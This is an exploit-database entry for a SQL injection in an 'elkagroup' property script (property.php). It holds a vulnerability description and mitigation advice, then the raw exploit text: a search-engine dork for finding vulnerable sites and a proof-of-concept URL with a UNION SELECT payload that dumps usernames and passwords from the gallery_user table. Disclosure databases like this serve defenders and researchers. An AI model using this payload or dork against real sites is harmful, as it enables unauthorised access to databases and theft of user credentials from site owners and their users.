header-logo
Suggest Exploit
vendor:
pid
by:
Hussin X
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: pid
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

elkagroup (pid ) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in elkagroup (pid ) which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to improper sanitization of user-supplied input in the 'cid' and 'uid' parameters of the 'property.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable server. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database, or even full compromise of the vulnerable system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

elkagroup (pid ) Remote SQL Injection Vulnerability

||    Author: Hussin X

||   Home :  WwW.IQ-TY.CoM<http://WwW.IQ-TY.CoM>

||    email:  darkangel_g85[at]Yahoo[DoT]com


||| script : http://www.elkapax.com &  http://www.elkagroup.com

||| DorK   : "Powered by : elkagroup.com<http://elkagroup.com>"

POC
________

http://[server]/[path]/property.php?cid=12&uid=0&pid=-168+union+select+1,username,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17+from+gallery_user--

end

IQ-SecuritY FoRuM

Navigation

Suggest Exploit

Services By CQR